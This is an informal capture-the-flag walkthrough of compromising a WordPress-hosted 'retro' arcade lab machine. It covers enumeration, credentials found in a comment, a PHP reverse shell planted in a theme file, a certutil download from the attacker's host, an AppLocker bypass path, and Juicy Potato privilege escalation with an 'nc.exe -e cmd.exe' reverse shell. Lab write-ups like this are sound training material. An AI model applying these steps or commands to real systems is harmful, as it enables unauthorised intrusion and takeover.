Less chatting more hacking š¤¤
Letās jump right into it
Here were working with a retro arcade, games and all that letās see what itās all about ā¦ā¦.
Upon firing up the machine we get an IP address
Enumeration
First thing for every good security operative is enumeration
so we run an nmap scan to know which ports/services are up and running
We see thereās only two ports running Port 80 and 3389 Thatās
- http and rdp
- Itās Good Practice to enumerate as much as you can
Running ffuf on the http service we get to know thereās a sub-directory
You can run ffuf recursively or do it as i did
Heading to the retro directory we see itās a site for games and the likes
In our scans and checking the source code we see itās CMS is wordpress 5.2.1
Head over to the log in page (bottom of the website)
Weāre Greeted with a thpical wordpress login page
All we need is User credentials
Checking the source code we notice a comment link
Heading to the comment link we get this
So We can guess the User name is wade and you can try the password from the gotten comment
Logging in weāre greeted with a dashboard
Exploitation
We can upload an RCE to wordpress CMS we just have to place it well
Your regular pentest monkey rev-shell wonāt work (didnāt work for me)
So letās go for Rev-shell 2.5
LINK TO THE REV
Replace the archive.php file
- Change the ip and port at the bottom of the script
- start a nc listener ārlwrap nc -lvnp $portā
- navigate to the archive.php āhttp://10.10.149.150/retro/wp-content/themes/90s-retro/archive.phpā
- Remember Change the IP š“
Weāre in š
- First thing first enumeration
- who are we ?
- What are our Privileges ?
Seeing SeImpersonateā¦. is Enabled we can use Juicy Potato for PrivEsc
- Get juicy potato, netcat binary
- Host it on your machine
- Download it in the victim machine(certutil -urlcache -f attacking-ip:port/file file)
Pls note there could be an applocker on windows, In our case there is cos if you try running the exe file youāll get a shell thatās stuck
To avoid that download the exe files and do everything you want to do in the applocker whitelisted path āC:\Windows\System32\spool\drivers\colorā
So yh everthing seems good
So now we create a bat file āecho C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe Ā IP 1515 > reverse.batā
Running āwmic Service get name,displayname,pathname,startmodeā gives us a list of running services
Choosing a CLISD
Juicy Potato CLISD
Start a netcat listener in a new tab on your machine with the port in the bat file
AND WE ARE DONE
LOOK FOR FILES ON YOUR OWN, itās your little task
Hit me up on Twitter if you run into any issues